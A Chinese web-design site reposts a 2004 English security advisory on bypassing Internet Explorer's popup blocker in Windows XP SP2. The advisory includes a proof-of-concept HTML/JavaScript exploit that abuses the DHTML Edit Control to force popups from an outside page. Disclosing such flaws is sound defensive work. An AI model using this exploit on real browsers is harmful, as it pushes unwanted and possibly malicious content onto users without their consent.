FLASH游戏 | 站长工具 | 技术学院 忙鱼网 怕笑网 
积木网
Flash | FrontPage | Golive | CSS | DreamWeaver | Firework | 初级教程 | 源码精华 | 经验技巧
推荐: PHP5中文在线手册 | Smarty中文手册(模板引擎) | css2样式表中文手册 | ASP开发手册 | JScript开发手册
积木网 >> 网页设计 >> 源码精华

Windows XP SP2广告弹出控制插件绕过漏洞已经测试方法

来源:互联摘选 日期:2003年09月25日 18:37:25
信息来源:securiteam.com & 邪恶八进制中国 [E.S.T]

Added by: A^C^E
Date: 14.12.04
Time: 10:27:05
Category: Exploits
Source: http://www.securiteam.com/windowsntfocus/6Y00D0UC0K.html

Summary
Internet Explorer for XP updated with SP2 enjoys a fairly robust popup blocking mechanism. In fact, older vulnerabilities exploited by many sites are no longer possible with the introduction of SP2 and the new popup blocker.

A way to circumvent the popup blocker has been found and it is easily exploitable as can be seen by the proof of concept supplied with this advisory.


Details
Vulnerable Systems:
* Internet Explorer on Windows XP SP2

The vulnerability can be exploited in order to popup a dialog through the "DHTML Edit Control" with a customized script. Such a script is listed below as a proof of concept:
< body onload="setTimeout(' main() ',1000)">
< object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
< PARAM NAME="ActivateApplets" VALUE="1">
< PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>

< SCRIPT>

// 10.11.04 http://www.editive.com

function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>

Additional information
The information has been provided by http-equiv.

(出处:http://www.Gimoo.net)

被阅读 0 次 本文现有评论 0
打印】 【收藏此页】 【关闭

强烈推荐

热门知识

最新文章

合作伙伴:网乐宽频 | 北京画廊
站长 服务邮箱:GimooHr(#)Gmail.Com 站长交流群:6412338 联系站长QQ号:36147437
Copyright © 2008 Gimoo.NetInc. all rights reserved 京ICP备05050695号